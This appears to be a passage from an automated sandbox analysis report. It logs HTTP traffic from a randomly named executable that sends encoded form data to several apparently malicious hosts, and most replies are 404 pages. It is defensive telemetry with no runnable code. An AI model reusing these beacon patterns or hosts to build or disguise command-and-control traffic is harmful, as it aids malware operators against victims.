                                              44192.168.11.30499373.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:14.967987061 CEST490OUTGET /clto/?7LY=Qp1XfCdsz8OJJJz3TLMvRPkoQesp985Iik5z4QR2yU8MVGcZykeEfqsbCV0TqEvKQ9KXAOYCUdjrGVGtx/egw088kz0UgyxAMHlR0NaM1s+K0msQl8MqjSQ=&Nze=C0klVT HTTP/1.1
                                              Host: www.tracy.club
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:29:15.073584080 CEST390INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Tue, 24 Sep 2024 09:29:15 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 4c 59 3d 51 70 31 58 66 43 64 73 7a 38 4f 4a 4a 4a 7a 33 54 4c 4d 76 52 50 6b 6f 51 65 73 70 39 38 35 49 69 6b 35 7a 34 51 52 32 79 55 38 4d 56 47 63 5a 79 6b 65 45 66 71 73 62 43 56 30 54 71 45 76 4b 51 39 4b 58 41 4f 59 43 55 64 6a 72 47 56 47 74 78 2f 65 67 77 30 38 38 6b 7a 30 55 67 79 78 41 4d 48 6c 52 30 4e 61 4d 31 73 2b 4b 30 6d 73 51 6c 38 4d 71 6a 53 51 3d 26 4e 7a 65 3d 43 30 6b 6c 56 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7LY=Qp1XfCdsz8OJJJz3TLMvRPkoQesp985Iik5z4QR2yU8MVGcZykeEfqsbCV0TqEvKQ9KXAOYCUdjrGVGtx/egw088kz0UgyxAMHlR0NaM1s+K0msQl8MqjSQ=&Nze=C0klVT"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              45192.168.11.3049938154.212.219.2804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:20.777054071 CEST770OUTPOST /dq8w/ HTTP/1.1
                                              Host: www.prj81oqde1.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.prj81oqde1.buzz
                                              Referer: http://www.prj81oqde1.buzz/dq8w/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 6d 75 49 78 4f 47 6e 4c 6d 4c 58 4c 78 33 55 4d 59 36 73 39 4b 56 59 50 36 76 37 4d 77 38 79 65 49 56 35 6b 56 75 4c 64 32 71 33 75 53 71 61 38 59 46 53 36 59 2f 41 31 31 67 61 42 30 68 58 77 57 76 4c 45 7a 6e 4b 37 6c 75 49 59 69 78 38 63 6f 39 59 6e 66 4c 7a 31 34 33 75 44 31 7a 4e 68 44 6d 2b 62 4a 50 38 6e 69 64 62 2f 66 34 45 34 65 46 54 4e 51 66 75 30 73 4b 48 58 58 4e 71 56 54 34 69 55 48 67 53 49 65 74 41 76 59 34 72 56 45 68 56 59 47 49 43 73 62 30 54 41 75 50 52 69 4b 33 5a 59 41 47 53 38 49 55 5a 6e 57 4f 70 62 48 2b 68 7a 41 6c 72 66 30 6c 6f 34 56 51 58 55 6a 77 3d 3d
                                              Data Ascii: 7LY=muIxOGnLmLXLx3UMY6s9KVYP6v7Mw8yeIV5kVuLd2q3uSqa8YFS6Y/A11gaB0hXwWvLEznK7luIYix8co9YnfLz143uD1zNhDm+bJP8nidb/f4E4eFTNQfu0sKHXXNqVT4iUHgSIetAvY4rVEhVYGICsb0TAuPRiK3ZYAGS8IUZnWOpbH+hzAlrf0lo4VQXUjw==
                                              Sep 24, 2024 11:29:21.218245983 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              46192.168.11.3049939154.212.219.2804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:23.632505894 CEST790OUTPOST /dq8w/ HTTP/1.1
                                              Host: www.prj81oqde1.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.prj81oqde1.buzz
                                              Referer: http://www.prj81oqde1.buzz/dq8w/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 6d 75 49 78 4f 47 6e 4c 6d 4c 58 4c 7a 58 45 4d 65 62 73 39 64 6c 59 4d 78 50 37 4d 2b 63 79 61 49 56 6c 6b 56 72 72 33 32 59 6a 75 63 75 65 38 62 45 53 36 4e 2f 41 31 68 51 62 46 77 68 58 33 57 76 50 4d 7a 6d 47 37 6c 75 63 59 69 30 59 63 6f 75 67 6d 46 37 7a 33 30 58 75 46 78 7a 4e 68 44 6d 2b 62 4a 4f 5a 4b 69 64 44 2f 66 4d 34 34 4d 6b 54 4f 64 2f 75 33 38 36 48 58 54 4e 71 52 54 34 69 36 48 68 4f 6d 65 76 34 76 59 34 37 56 48 31 42 62 49 49 43 71 47 45 53 45 75 71 6b 77 4d 6d 39 4a 57 6c 43 47 4e 45 78 75 61 35 59 42 61 39 56 78 54 46 58 79 6f 6b 46 51 58 53 57 50 2b 78 4e 6e 69 4e 36 54 70 79 51 4a 4d 33 45 55 32 38 6d 59 6a 69 45 3d
                                              Data Ascii: 7LY=muIxOGnLmLXLzXEMebs9dlYMxP7M+cyaIVlkVrr32Yjucue8bES6N/A1hQbFwhX3WvPMzmG7lucYi0YcougmF7z30XuFxzNhDm+bJOZKidD/fM44MkTOd/u386HXTNqRT4i6HhOmev4vY47VH1BbIICqGESEuqkwMm9JWlCGNExua5YBa9VxTFXyokFQXSWP+xNniN6TpyQJM3EU28mYjiE=
                                              Sep 24, 2024 11:29:23.946474075 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              47192.168.11.3049940154.212.219.2804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:26.611701012 CEST1289OUTPOST /dq8w/ HTTP/1.1
                                              Host: www.prj81oqde1.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.prj81oqde1.buzz
                                              Referer: http://www.prj81oqde1.buzz/dq8w/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 6d 75 49 78 4f 47 6e 4c 6d 4c 58 4c 7a 58 45 4d 65 62 73 39 64 6c 59 4d 78 50 37 4d 2b 63 79 61 49 56 6c 6b 56 72 72 33 32 5a 62 75 63 62 4b 38 5a 6e 71 36 66 50 41 31 69 51 62 49 77 68 57 72 57 76 33 49 7a 6d 61 42 6c 73 6b 59 6a 57 51 63 2f 76 67 6d 4c 4c 7a 33 38 33 75 41 31 7a 4e 77 44 6d 75 58 4a 50 70 4b 69 64 44 2f 66 4e 6f 34 61 46 54 4f 66 2f 75 30 73 4b 47 57 58 4e 71 35 54 34 37 48 48 68 61 59 65 74 6f 76 66 4c 7a 56 48 47 35 62 49 49 43 71 63 30 53 2f 75 71 67 74 4d 6d 31 56 57 6b 4b 4a 4f 31 56 75 4a 59 78 37 4c 4f 31 79 51 30 2f 6a 6b 55 39 52 52 55 61 69 2b 32 39 44 76 74 32 79 67 6a 45 47 41 6d 77 33 75 75 72 5a 31 57 4a 47 66 5a 72 74 6b 43 75 64 50 66 51 79 77 56 36 5a 32 73 30 6f 74 76 79 67 7a 68 6f 35 6d 72 7a 4a 67 49 66 76 4c 78 6a 5a 74 79 2b 33 34 54 42 32 64 78 32 45 39 4b 35 47 45 53 47 4a 59 43 4a 37 6f 5a 6e 50 6e 46 51 79 30 6f 77 63 72 6f 53 75 36 2f 78 33 6f 72 78 37 78 64 68 42 34 71 46 7a 6e 48 2b 36 71 5a 45 2f 67 42 70 5a 31 59 73 42 50 77 56 59 32 57 [TRUNCATED]
                                              Data Ascii: 7LY=muIxOGnLmLXLzXEMebs9dlYMxP7M+cyaIVlkVrr32ZbucbK8Znq6fPA1iQbIwhWrWv3IzmaBlskYjWQc/vgmLLz383uA1zNwDmuXJPpKidD/fNo4aFTOf/u0sKGWXNq5T47HHhaYetovfLzVHG5bIICqc0S/uqgtMm1VWkKJO1VuJYx7LO1yQ0/jkU9RRUai+29Dvt2ygjEGAmw3uurZ1WJGfZrtkCudPfQywV6Z2s0otvygzho5mrzJgIfvLxjZty+34TB2dx2E9K5GESGJYCJ7oZnPnFQy0owcroSu6/x3orx7xdhB4qFznH+6qZE/gBpZ1YsBPwVY2WufORZJqvNsx6oFBMM1J9nvd1mTMZk4So6x0c+3XKnUc+EuS1pBPsSqPAFs49G/VxNh8JR7KKk6zYZPRGAY7RrfiMx1Tp4KuQvMZDVitQV0ufi5okHWi6JxqqblD1mILEWHKdDKYykD8djCUFOqAq90T+OSoSuaheq7DJl83M6ix1l9ZzGoxzs1IXFtAwGB/V1gQZlS2RRxvjKTul4RxJPeHzO8Y8L7V7JjgBbcVjl+QmWDCeVR7WKM8mGqE5edCgt9u6Ujq53LHUxI4ztugawvx+fdQ3s/yUeQ+CZTFzlW+BFUBUcaT9pUtPbntNmWtg8n/xRkSxb85S3PaSYc50fDrEHfVb3y9PbyD894uGDtDuW+FRf82UH+QqqWmw
                                              Sep 24, 2024 11:29:26.611759901 CEST2618OUTData Raw: 74 76 54 2b 49 64 47 78 39 74 6e 54 6c 36 7a 6a 59 67 61 74 4b 55 41 5a 62 46 64 4f 4e 43 39 2f 41 6f 53 5a 45 59 4a 4a 32 73 6f 51 38 2f 49 6b 53 2f 7a 7a 38 5a 37 2b 38 6f 68 38 78 54 61 33 79 69 39 51 32 78 72 35 63 42 63 37 56 34 6b 62 51 58
                                              Data Ascii: tvT+IdGx9tnTl6zjYgatKUAZbFdONC9/AoSZEYJJ2soQ8/IkS/zz8Z7+8oh8xTa3yi9Q2xr5cBc7V4kbQXZfZFiNu46KiYvovriCmL29CJemtWh2JLT2ESbZYjeQEQR3oTFfHjtAONoFJ/H3qZlfj6vimLXcplH7E8lKRco4lW/750w4ODpImtRQfv51eiptC4Wm0+eZKRCGRZel4QR4hBIFnwhsxioXO5RsYF7UI6Mk8JfzZQZ
                                              Sep 24, 2024 11:29:27.043819904 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              48192.168.11.3049941154.212.219.2804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:29.457438946 CEST495OUTGET /dq8w/?7LY=rsgRN2uYsqPg3Qo/YYYAeG4xg8L475vmQkQHQbPGwaKvYIbbYiGFBNgcl1Tl9BL7RarA80Sklr82mx1ZpdFfI7nWlECEwgJhN036ZdAkz4rYHuoxU1i8U5s=&Nze=C0klVT HTTP/1.1
                                              Host: www.prj81oqde1.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:29:29.773740053 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              49192.168.11.3049942206.119.82.147804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:35.490955114 CEST755OUTPOST /vacs/ HTTP/1.1
                                              Host: www.wdeb18.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.wdeb18.top
                                              Referer: http://www.wdeb18.top/vacs/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 41 79 55 56 39 68 41 72 35 38 4b 33 6e 62 79 76 79 33 6e 57 7a 43 2f 4d 64 43 31 72 4e 63 49 62 6c 55 41 76 38 73 7a 4f 68 52 4f 49 7a 4e 4c 6a 51 69 53 53 78 46 65 4d 44 78 58 39 6b 65 6e 42 64 74 58 6e 65 4c 66 30 70 2f 49 31 39 4d 41 6b 44 48 4d 30 77 4f 56 68 74 76 58 62 6e 33 32 48 6f 61 52 55 34 47 71 59 53 66 57 45 36 54 79 65 72 7a 34 75 4a 7a 69 58 57 54 54 42 59 39 6d 47 34 6f 69 66 78 79 6e 73 41 50 67 32 51 52 6e 69 69 5a 49 31 32 41 68 4a 55 47 56 54 58 37 4b 78 33 76 61 34 64 48 46 56 77 6a 57 41 2b 4b 6d 4e 6e 67 72 4d 4c 32 69 4b 4c 4c 67 52 6a 32 4a 47 62 51 3d 3d
                                              Data Ascii: 7LY=AyUV9hAr58K3nbyvy3nWzC/MdC1rNcIblUAv8szOhROIzNLjQiSSxFeMDxX9kenBdtXneLf0p/I19MAkDHM0wOVhtvXbn32HoaRU4GqYSfWE6Tyerz4uJziXWTTBY9mG4oifxynsAPg2QRniiZI12AhJUGVTX7Kx3va4dHFVwjWA+KmNngrML2iKLLgRj2JGbQ==
                                              Sep 24, 2024 11:29:35.805591106 CEST302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:35 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66aa3fcf-8a"
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              50192.168.11.3049943206.119.82.147804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:38.345809937 CEST775OUTPOST /vacs/ HTTP/1.1
                                              Host: www.wdeb18.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.wdeb18.top
                                              Referer: http://www.wdeb18.top/vacs/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 41 79 55 56 39 68 41 72 35 38 4b 33 31 72 43 76 77 57 6e 57 6d 53 2f 4e 54 69 31 72 48 38 49 58 6c 55 38 76 38 75 65 54 69 6a 71 49 32 63 37 6a 43 54 53 53 77 46 65 4d 58 68 58 34 36 75 6e 66 64 74 62 76 65 4b 6a 30 70 2f 30 31 39 4e 77 6b 44 77 59 33 77 65 56 5a 6b 50 58 5a 6a 33 32 48 6f 61 52 55 34 47 75 6d 53 65 2b 45 36 6a 43 65 71 53 34 74 45 54 69 49 52 54 54 42 63 39 6e 50 34 6f 69 39 78 7a 37 53 41 4b 38 32 51 52 33 69 73 6f 49 79 38 41 68 44 4b 47 55 63 66 34 33 56 32 2f 61 4c 4e 33 35 75 33 33 36 43 32 39 58 58 36 6a 66 4f 59 57 65 6e 58 4b 4e 35 68 30 49 64 47 52 6a 61 77 75 4c 67 65 58 4b 34 62 70 75 67 7a 48 56 41 34 75 41 3d
                                              Data Ascii: 7LY=AyUV9hAr58K31rCvwWnWmS/NTi1rH8IXlU8v8ueTijqI2c7jCTSSwFeMXhX46unfdtbveKj0p/019NwkDwY3weVZkPXZj32HoaRU4GumSe+E6jCeqS4tETiIRTTBc9nP4oi9xz7SAK82QR3isoIy8AhDKGUcf43V2/aLN35u336C29XX6jfOYWenXKN5h0IdGRjawuLgeXK4bpugzHVA4uA=
                                              Sep 24, 2024 11:29:38.658900023 CEST302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:38 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66aa3fcf-8a"
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
